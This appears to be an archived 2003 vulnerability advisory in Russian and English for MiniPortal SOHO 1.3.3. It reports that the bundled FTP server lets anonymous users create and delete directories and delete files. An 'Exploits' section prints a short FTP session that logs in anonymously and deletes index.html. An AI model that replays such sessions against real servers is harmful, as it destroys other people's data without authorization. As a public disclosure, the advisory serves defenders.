MiniPortal SOHO

2003-03-31T00:00:00
ID SECURITYVULNS:DOC:4302
Type securityvulns
Reporter Securityvulns
Modified 2003-03-31T00:00:00

Description

Product : MiniPortal SOHO Version : 1.3.3 OSystem : Windows Authors : Instant Servers Inc WebSite : http://www.instantservers.com Problem : Create and Remove directories with anonymous access

Description:

rus:

MiniPortal включает в себя следующие компоненты: WEB Server [Apache 1.3.27] FTP Server DNS Server В ходе исследования компонентов сервера, было выявлено следующее: Анонимный пользователь может создавать и удалять дириктории на сервере, а также может удалять любые файлы на нем.

eng:

MiniPortal includes the following components: WEB Server [Apache 1.3.27] FTP Server DNS Server During research of components of the server, the following was revealed: The anonymous user can create and delete directories on the server, And also can delete any files on it.

Exploits:

>>Telnet 127.0.0.1 21 220 FTP Server, ready >> USER anonymous 331 Password required >> PASS anonymous@localhost 230 User logged in >>MKD test 257 "test" created >>RMD test 200 Okay >>DELE index.html 200 Okay

Contacts:

r2subj3ct@dwclan.org subj.24h.to (www.dwcgr0up.com/subj/) www.dwcgr0up.com irc.dwcgr0up.biz #dwc

Thanks:

DHG, GipsHack, Netp0is0n, de1irium, r00tc0de, f0kp, exploit.ru, nobodies DethSpirit, r4ShRaY, D4rkGr3y, Moby, Orb, Foster, Owned, prior, Demon.